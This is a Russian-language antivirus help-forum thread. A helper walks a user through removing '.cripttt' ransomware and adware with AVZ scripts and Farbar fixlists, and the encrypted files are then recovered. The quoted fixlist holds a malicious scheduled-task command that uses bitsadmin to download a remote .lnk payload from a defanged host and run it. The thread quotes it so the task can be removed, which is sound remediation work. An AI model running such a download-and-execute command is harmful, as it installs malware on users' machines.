Перейти к содержанию

Вирус шифровальщик замена формата на ".cripttt"


Рекомендуемые сообщения

Здравствуйте!

Друг принес комп, сказав подцепил какой то вирус я так понял с инета. Все файлы ".jpg .doc" зашифрованы. имеют расширение .cripttt. Скачал из инета антивирусник  Dr.Web CureIt. Запускался через USB флешку. После сканирование были обнаружен Криптовирус. Dr.Web благополучно с ним расправился. Но файлы по прежнему зашифрованы. Чем можно их расшифровать? Помогите модераторы и форумчане!!! 

 

 

 


 

CollectionLog-2016.04.19-23.59.zip

Ссылка на комментарий
Поделиться на другие сайты

Здравствуйте!

 

Через Панель управления - Удаление программ - удалите нежелательное ПО:

Free VPN version 3.2

HDef

TSearch

 

Закройте все программы, временно выгрузите антивирус, файерволл и прочее защитное ПО.

 

Выполните скрипт в AVZ (Файл - Выполнить скрипт):

 

begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk', '');
 QuarantineFile('C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk', '');
 QuarantineFile('C:\ProgramData\OZEXbaP\MsDMTKWwhP5.exe', '');
 QuarantineFile('C:\Users\Администратор\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.ico', '');
 QuarantineFileF('C:\ProgramData\OZEXbaP', '*', true, '', 0, 0);
 QuarantineFileF('c:\programdata\timetasks', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', true, '', 0 ,0);
 QuarantineFileF('c:\program files\zaxar', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', true, '', 0 ,0);
 QuarantineFile('C:\ProgramData\TimeTasks\timetasks.exe', '');
 QuarantineFile('C:\Program Files\Zaxar\ZaxarGameBrowser.exe', '');
 QuarantineFile('C:\Program Files\Zaxar\ZaxarLoader.exe', '');
 QuarantineFile('C:\$Recycle.Bin\S-1-5-21-838487189-539206816-3623330401-500\hl.exe', '');
 DeleteFile('C:\ProgramData\OZEXbaP\MsDMTKWwhP5.exe', '');
 DeleteFile('C:\Users\Администратор\AppData\Local\Microsoft\Start Menu\Вoйти в Интeрнeт.ico', '');
 DeleteFile('C:\ProgramData\TimeTasks\timetasks.exe', '32');
 DeleteFile('C:\Program Files\Zaxar\ZaxarGameBrowser.exe', '32');
 DeleteFile('C:\Program Files\Zaxar\ZaxarLoader.exe', '32');
 DeleteFile('C:\$Recycle.Bin\S-1-5-21-838487189-539206816-3623330401-500\hl.exe', '32');
 DeleteFileMask('C:\ProgramData\OZEXbaP', '*', true);
 DeleteFileMask('c:\programdata\timetasks', '*', true);
 DeleteFileMask('c:\program files\zaxar', '*', true);
 DeleteDirectory('C:\ProgramData\OZEXbaP');
 DeleteDirectory('c:\programdata\timetasks');
 DeleteDirectory('c:\program files\zaxar');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\mckjnfvypt','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Timestasks','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ZaxarGameBrowser','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ZaxarLoader','command');
BC_ImportALL;
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

 

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте отправьте по адресу newvirus@kaspersky.com

 

Полученный ответ сообщите здесь (с указанием номера KLAN)

 

 

Файл CheckBrowserLnk.log

из папки

...\AutoLogger\CheckBrowserLnk

перетащите на утилиту ClearLNK.

 

move.gif

 

Отчёт о работе в виде файла ClearLNK-<Дата>.log прикрепите к вашему следующему сообщению.

  • Скачайте AdwCleaner (by Xplode) и сохраните его на Рабочем столе.
  • Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s1].txt.
  • Прикрепите отчет к своему следующему сообщению.
Подробнее читайте в этом руководстве.
Ссылка на комментарий
Поделиться на другие сайты

Здравствуйте!

 

Через Панель управления - Удаление программ - удалите нежелательное ПО:

Free VPN version 3.2

HDef

TSearch

 

1 Данные вредоносные ПО были найдены и удалены, через удаление программ.

2 Отчет с указанием номера KLAN от kaspersky.com

 

Запрос на исследование вредоносного файла [KLAN-4121322111]

 

Здравствуйте,

Это сообщение сформировано автоматической системой приёма писем. Сообщение содержит информацию о том, какие вердикты на файлы (если таковые есть в письме) выносит Антивирус с последними обновлениями. 

 

Launch Internet Explorer Browser.lnk,

Internet Explorer.lnk,

Internet Explorer (No Add-ons).lnk,

MsDMTKWwhP5.exe,

Вoйти в Интeрнeт.ico,

DASgejVsp,

EPCCiD,

isVWuQwD,

JkWnSm,

LHUgdehX,

QJwHdFjw,

zInxQL,

bcqr00003.dat,

bcqr00004.dat,

bcqr00005.dat,

bcqr00006.dat,

bcqr00009.dat,

bcqr00010.dat

 

Получен набор неизвестных файлов, они будут переданы в Вирусную Лабораторию.

 

С уважением, Лаборатория Касперского

 

"125212, Россия, Москва, Ленинградское шоссе, д.39А, стр.3 Тел./факс: + 7 (495) 797 8700 http://www.kaspersky.ruhttp://www.viruslist.ru"

3. Отчёт о работе в виде файла ClearLNK-<Дата>.log

4.

 

  • Скачайте AdwCleaner (by Xplode) и сохраните его на Рабочем столе.
  • Запустите его (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Scan" ("Сканировать") и дождитесь окончания сканирования.
  • Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s1].txt.
  • Прикрепите отчет к своему следующему сообщению.
Подробнее читайте в этом руководстве.

 

 

+ Пришлите еще 5 зашифрованных файлов в архиве.

Интересно что в каждой папке где находятся зашифрованные документы либо фотографии присутствует странный файел "SHTODELATVAM.txt" 

ClearLNK-20.04.2016_21-17.rar

AdwCleanerS1.txt

5 зашифрованных файлов.rar

Ссылка на комментарий
Поделиться на другие сайты

1.

  • Запустите повторно AdwCleaner (by Xplode) (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора).
  • Нажмите кнопку "Scan" ("Сканировать").
  • По окончании сканирования в меню Настройки отметьте дополнительно:
    • Сброс политик IE
    • Сброс политик Chrome
  • Нажмите кнопку "Cleaning" ("Очистка") и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C1].txt.
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Очистите средствами AdwCleaner всё, кроме папок от mail.ru. Если программами от mail.ru не пользуетесь, то их тоже очистите.

 

Подробнее читайте в этом руководстве.

 

 

2.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Отметьте галочкой также "Shortcut.txt".

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве.

Ссылка на комментарий
Поделиться на другие сайты

1.

  • Запустите повторно AdwCleaner (by Xplode) (в ОС Vista/Windows 7, 8, 8.1, 10 необходимо запускать через правую кн. мыши от имени администратора).
  • Нажмите кнопку "Scan" ("Сканировать").
  • По окончании сканирования в меню Настройки отметьте дополнительно:
    • Сброс политик IE
    • Сброс политик Chrome
  • Нажмите кнопку "Cleaning" ("Очистка") и дождитесь окончания удаления.
  • Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C1].txt.
  • Прикрепите отчет к своему следующему сообщению
Внимание: Для успешного удаления нужна перезагрузка компьютера!.

 

Очистите средствами AdwCleaner всё, кроме папок от mail.ru. Если программами от mail.ru не пользуетесь, то их тоже очистите.

 

Подробнее читайте в этом руководстве.

 

2.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Отметьте галочкой также "Shortcut.txt".

 

Нажмите кнопку Scan.

После окончания сканирования будут созданы отчеты FRST.txtAddition.txtShortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.

Подробнее читайте в этом руководстве

AdwCleanerC1.txt

Addition.txt

Shortcut.txt

FRST.txt

Ссылка на комментарий
Поделиться на другие сайты

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

start
CreateRestorePoint:
CHR Extension: (No Name) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-06]
2016-04-01 18:17 - 2016-04-01 18:17 - 00000000 ____D C:\Users\Все пользователи\xuqltMACM
2016-04-01 17:08 - 2016-04-01 17:08 - 00000000 ____D C:\Users\Все пользователи\qOfpbRkMBf
2016-04-01 17:08 - 2016-04-01 17:08 - 00000000 ____D C:\Users\Все пользователи\pZOPQzLBa
2016-04-01 17:06 - 2016-04-01 17:06 - 00000000 ____D C:\Users\Все пользователи\vuUaxY
2016-04-01 17:06 - 2016-04-01 17:06 - 00000000 ____D C:\Users\Все пользователи\HJxGJRhsv
2016-03-30 19:44 - 2016-03-30 19:44 - 00000000 ____D C:\Users\Все пользователи\LxAjlXZ
2016-03-30 19:44 - 2016-03-30 19:44 - 00000000 ____D C:\Users\Все пользователи\FGiSTPeoH
2016-03-29 19:54 - 2016-03-29 19:54 - 00000000 ____D C:\Users\Все пользователи\rfgalywbQg
2016-03-29 19:54 - 2016-03-29 19:54 - 00000000 ____D C:\Users\Все пользователи\lGIOZHApuF
2016-03-28 19:17 - 2016-03-28 19:17 - 00000000 ____D C:\Users\Все пользователи\SZgIlH
2016-03-28 19:16 - 2016-03-28 19:16 - 00000000 ____D C:\Users\Все пользователи\eHRdzAiobR
2016-03-28 19:15 - 2016-03-28 19:15 - 00000000 ____D C:\Users\Все пользователи\PpNYhjlp
2016-03-28 19:15 - 2016-03-28 19:15 - 00000000 ____D C:\Users\Все пользователи\FVQYSq
2016-03-27 16:07 - 2016-03-27 16:07 - 00000000 ____D C:\Users\Все пользователи\ttHjKn
2016-03-27 16:07 - 2016-03-27 16:07 - 00000000 ____D C:\Users\Все пользователи\FOzWWE
2016-03-27 16:06 - 2016-03-27 16:06 - 00000000 ____D C:\Users\Все пользователи\MRKGgmNoV
2016-03-27 16:06 - 2016-03-27 16:06 - 00000000 ____D C:\Users\Все пользователи\IdsZSUhDpd
2016-03-25 18:02 - 2016-03-25 18:02 - 00000000 ____D C:\Users\Все пользователи\EeCqIwUB
2016-03-25 18:02 - 2016-03-25 18:02 - 00000000 ____D C:\Users\Все пользователи\cXnAmNove
2016-03-24 17:41 - 2016-03-24 17:41 - 00000000 ____D C:\Users\Все пользователи\NjoQsaIAN
2016-03-24 17:41 - 2016-03-24 17:41 - 00000000 ____D C:\Users\Все пользователи\jrPsOSWaGD
C:\Users\Администратор\AppData\Local\Temp\2B80.tmp.exe
C:\Users\Администратор\AppData\Local\Temp\AmigoDistrib.exe
C:\Users\Администратор\AppData\Local\Temp\Archive_File231144.exe
C:\Users\Администратор\AppData\Local\Temp\bdfilters.dll
C:\Users\Администратор\AppData\Local\Temp\BingSvc.exe
C:\Users\Администратор\AppData\Local\Temp\BSvcProcessor.exe
C:\Users\Администратор\AppData\Local\Temp\BSvcUpdater.exe
C:\Users\Администратор\AppData\Local\Temp\doit.exe
C:\Users\Администратор\AppData\Local\Temp\gdiplus.dll
C:\Users\Администратор\AppData\Local\Temp\hcv_mailruhomesearch (1).exe
C:\Users\Администратор\AppData\Local\Temp\hcv_mailruhomesearch (2).exe
C:\Users\Администратор\AppData\Local\Temp\hcv_mailruhomesearch.exe
C:\Users\Администратор\AppData\Local\Temp\jre-8u77-windows-au.exe
C:\Users\Администратор\AppData\Local\Temp\libeay32.dll
C:\Users\Администратор\AppData\Local\Temp\mailruhomesearch.exe
C:\Users\Администратор\AppData\Local\Temp\msvcr120.dll
C:\Users\Администратор\AppData\Local\Temp\nsv53CE.tmp.exe
C:\Users\Администратор\AppData\Local\Temp\R2PCServ.exe
C:\Users\Администратор\AppData\Local\Temp\R2PCSH.exe
C:\Users\Администратор\AppData\Local\Temp\shfolder.dll
C:\Users\Администратор\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Администратор\AppData\Local\Temp\sq1jWew1eVnC.exe
Task: {5B37196C-6235-42AA-98ED-7B1279F008B1} - System32\Tasks\{D760A4E6-34A9-4BF6-8211-043F0CB96C60} => c:\users\Администратор\appdata\local\amigo\application\amigo.exe
Task: {7E7EA1CE-B09B-4557-9175-DC102A711C74} - System32\Tasks\RotatorCom => "/q /c start /min /wait bitsadmin /transfer d /download /priority foreground hxxp://krible-krable-bums.com/api/task/1000379.lnk %TMP%\torrent.lnk & start %TMP%\torrent.lnk"
C:\Users\Администратор\Desktop\Войны престолов.lnk
FirewallRules: [{49BDEB57-6884-481F-A527-10D346EC13F5}] => (Allow) C:\Program Files\UBar\ubar.exe
Reboot:
end
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool.

Отключите до перезагрузки антивирус, запустите FRST, нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Ссылка на комментарий
Поделиться на другие сайты

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

start
CreateRestorePoint:
CHR Extension: (No Name) - C:\Users\Администратор\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-06]
2016-04-01 18:17 - 2016-04-01 18:17 - 00000000 ____D C:\Users\Все пользователи\xuqltMACM
2016-04-01 17:08 - 2016-04-01 17:08 - 00000000 ____D C:\Users\Все пользователи\qOfpbRkMBf
2016-04-01 17:08 - 2016-04-01 17:08 - 00000000 ____D C:\Users\Все пользователи\pZOPQzLBa
2016-04-01 17:06 - 2016-04-01 17:06 - 00000000 ____D C:\Users\Все пользователи\vuUaxY
2016-04-01 17:06 - 2016-04-01 17:06 - 00000000 ____D C:\Users\Все пользователи\HJxGJRhsv
2016-03-30 19:44 - 2016-03-30 19:44 - 00000000 ____D C:\Users\Все пользователи\LxAjlXZ
2016-03-30 19:44 - 2016-03-30 19:44 - 00000000 ____D C:\Users\Все пользователи\FGiSTPeoH
2016-03-29 19:54 - 2016-03-29 19:54 - 00000000 ____D C:\Users\Все пользователи\rfgalywbQg
2016-03-29 19:54 - 2016-03-29 19:54 - 00000000 ____D C:\Users\Все пользователи\lGIOZHApuF
2016-03-28 19:17 - 2016-03-28 19:17 - 00000000 ____D C:\Users\Все пользователи\SZgIlH
2016-03-28 19:16 - 2016-03-28 19:16 - 00000000 ____D C:\Users\Все пользователи\eHRdzAiobR
2016-03-28 19:15 - 2016-03-28 19:15 - 00000000 ____D C:\Users\Все пользователи\PpNYhjlp
2016-03-28 19:15 - 2016-03-28 19:15 - 00000000 ____D C:\Users\Все пользователи\FVQYSq
2016-03-27 16:07 - 2016-03-27 16:07 - 00000000 ____D C:\Users\Все пользователи\ttHjKn
2016-03-27 16:07 - 2016-03-27 16:07 - 00000000 ____D C:\Users\Все пользователи\FOzWWE
2016-03-27 16:06 - 2016-03-27 16:06 - 00000000 ____D C:\Users\Все пользователи\MRKGgmNoV
2016-03-27 16:06 - 2016-03-27 16:06 - 00000000 ____D C:\Users\Все пользователи\IdsZSUhDpd
2016-03-25 18:02 - 2016-03-25 18:02 - 00000000 ____D C:\Users\Все пользователи\EeCqIwUB
2016-03-25 18:02 - 2016-03-25 18:02 - 00000000 ____D C:\Users\Все пользователи\cXnAmNove
2016-03-24 17:41 - 2016-03-24 17:41 - 00000000 ____D C:\Users\Все пользователи\NjoQsaIAN
2016-03-24 17:41 - 2016-03-24 17:41 - 00000000 ____D C:\Users\Все пользователи\jrPsOSWaGD
C:\Users\Администратор\AppData\Local\Temp\2B80.tmp.exe
C:\Users\Администратор\AppData\Local\Temp\AmigoDistrib.exe
C:\Users\Администратор\AppData\Local\Temp\Archive_File231144.exe
C:\Users\Администратор\AppData\Local\Temp\bdfilters.dll
C:\Users\Администратор\AppData\Local\Temp\BingSvc.exe
C:\Users\Администратор\AppData\Local\Temp\BSvcProcessor.exe
C:\Users\Администратор\AppData\Local\Temp\BSvcUpdater.exe
C:\Users\Администратор\AppData\Local\Temp\doit.exe
C:\Users\Администратор\AppData\Local\Temp\gdiplus.dll
C:\Users\Администратор\AppData\Local\Temp\hcv_mailruhomesearch (1).exe
C:\Users\Администратор\AppData\Local\Temp\hcv_mailruhomesearch (2).exe
C:\Users\Администратор\AppData\Local\Temp\hcv_mailruhomesearch.exe
C:\Users\Администратор\AppData\Local\Temp\jre-8u77-windows-au.exe
C:\Users\Администратор\AppData\Local\Temp\libeay32.dll
C:\Users\Администратор\AppData\Local\Temp\mailruhomesearch.exe
C:\Users\Администратор\AppData\Local\Temp\msvcr120.dll
C:\Users\Администратор\AppData\Local\Temp\nsv53CE.tmp.exe
C:\Users\Администратор\AppData\Local\Temp\R2PCServ.exe
C:\Users\Администратор\AppData\Local\Temp\R2PCSH.exe
C:\Users\Администратор\AppData\Local\Temp\shfolder.dll
C:\Users\Администратор\AppData\Local\Temp\SkypeSetup.exe
C:\Users\Администратор\AppData\Local\Temp\sq1jWew1eVnC.exe
Task: {5B37196C-6235-42AA-98ED-7B1279F008B1} - System32\Tasks\{D760A4E6-34A9-4BF6-8211-043F0CB96C60} => c:\users\Администратор\appdata\local\amigo\application\amigo.exe
Task: {7E7EA1CE-B09B-4557-9175-DC102A711C74} - System32\Tasks\RotatorCom => "/q /c start /min /wait bitsadmin /transfer d /download /priority foreground hxxp://krible-krable-bums.com/api/task/1000379.lnk %TMP%\torrent.lnk & start %TMP%\torrent.lnk"
C:\Users\Администратор\Desktop\Войны престолов.lnk
FirewallRules: [{49BDEB57-6884-481F-A527-10D346EC13F5}] => (Allow) C:\Program Files\UBar\ubar.exe
Reboot:
end
и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool.

Отключите до перезагрузки антивирус, запустите FRST, нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

 

Fixlog.txt

Ссылка на комментарий
Поделиться на другие сайты

Все супер!

 

Найдено 16505

Расшифровано 16264

 

Большое спасибо!!!!!

 

Я в отчете так и не разобрался где находятся эти не расшифрованные. Уж очень он весомый.

Что с копиями теперь делать?  Удалить повторно при расшифровке?

Ссылка на комментарий
Поделиться на другие сайты

16:38:48.0321 0x0b6c  CheckFile: DecryptFile(\\?\E:\ФОТОГРАФИИ\болгария 1 2014\DSC_0783.JPG.cripttt) error

Где есть такая строка, те файлы не расшифровались. Скопируйте все такие файлы в одну папку, упакуйте в архив, загрузите на Яндекс диск и пришлите ссылку мне в ЛС.

  • Спасибо (+1) 1
  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • Sapfira
      Автор Sapfira
      В связи с тем, что сервис закладок Pocket закрывается, нужно найти хорошую альтернативу.
      Важно, чтобы по дизайну и функционалу аналог был похож на "Покет", чтобы было браузерное расширение, при нажатии на которое, страница автоматически сохраняется (так же как в Покете) и возможность импортировать туда все закладки из Покета. И чтобы был бесплатным.
       
      Из самого подходящего нашла сервис Raindrop.io, но оказалось, что расширение не работает в Яндекс Браузере (при нажатии на расширение, просит войти, хотя вход уже выполнен). Потом попробовала Evernote, но он не понравился, там совсем всё по-другому.
       
      Ещё нашла Hoarder, по виду подходящий, но похоже платный.
       
      В общем, не понятно, куда теперь переходить. 
       
       
    • AlexYarm
      Автор AlexYarm
      Зашифровались файлы. Расширение файлов hardbit4. Прилагаю необходимые архивы. Прошу помочь с расшифровкой.
      Hardbit4Virus.zip
    • vasia15
      Автор vasia15
      вирус блокирует возможность скачать антивирус,все программы заполняет кракозябрами,установить нет возможности.прошу помощи.сам не справляюсь.
    • escadron
      Автор escadron
      В далеком 2015 году скачал какую-то фигню на комп, потерял практически все фотографии и видео. Получил от матери по шапке и благополучно об этом забыл.
      Сейчас же внезапно захотелось восстановить файлы, если, конечно, это возможно.
      Из-за ограничений формата прикрепляемых файлов не могу предоставить пример зашифрованных данных.
      Файл с почтой/другой информацией (README**.txt) либо был утерян, либо же вообще не появлялся на компьютере.
      Надеюсь, знатоки смогут помочь.
    • Keldenis
      Автор Keldenis
      Здравствуйте! Наш сервер был поражен вирусом-шифровальщиком. Все зараженные файлы приобрели вид блокнота при нажатии на который выходило сообщение от мошенников. Мы воспользовались утилитой от Касперского Rakhni Decryptor. Она смогла подобрать пароль и (по её мнению) расшифровать файлы. Но ни один из "расшифрованных" файлов не открывался. При этом, мы использовали утилиту дважды. В первый раз мы не использовали функцию удаления пораженных файлов, расшифрованная копия которых уже была сделана. Таким образом, после первого использования утилиты, у нас на сервере появились копии практически всех зашифрованных файлов. При этом, сам зашифрованный файл имел вид блокнотика, а его расшифрованная копия имела обычный для такого типа файла внешний вид. У зашифрованных файлов и их расшифрованной копии, при этом, был одинаковый размер файла. Мы решили, что, возможно нам нужно было поставить галочку для функции "Удалять зашифрованные файлы после успешной расшифровки", чтобы после расшифровки файлы открывались. Кроме того, дубляж файлов съел практически всё свободное место на наших жестких дисках. Поэтому, мы удалили наиболее тяжелые копии расшифрованных файлов и запустили утилиту повторно, поставив галочку для удаления зашифрованных файлов. Утилита вновь успешно подобрала пароль и расшифровала файлы, удалив все зашифрованные. Но файлы так и не начали открываться. Как описано выше, мы удалили копии только тяжелых файлов. Те зашифрованные файлы, расшифрованные копии которых мы не удалили после первого применения утилиты, при втором использовании утилиты остались нетронутыми. Поэтому мы прикрепляем в архиве именно такие файлы, т.е. сам зашифрованный файл и его расшифрованную утилитой копию, чтобы понять на примере зашифрованного файла, можно ли его расшифровать; а на примере "расшифрованного" утилитой файла, действительно ли он был расшифрован, но не открывается, потому что испорчен и не подлежит или подлежит восстановлению, либо он не был на самом деле расшифрован, и его всё еще можно расшифровать в будущем, хоть он уже и не имеет вид того самого блокнотика. Кроме того, мы установили антивирус от Касперсого на сервер и он, вероятно, уже удалил сам файл шифровальщик.
      Зашифрованные файлы.zip Addition.txt FRST.txt
×
×
  • Создать...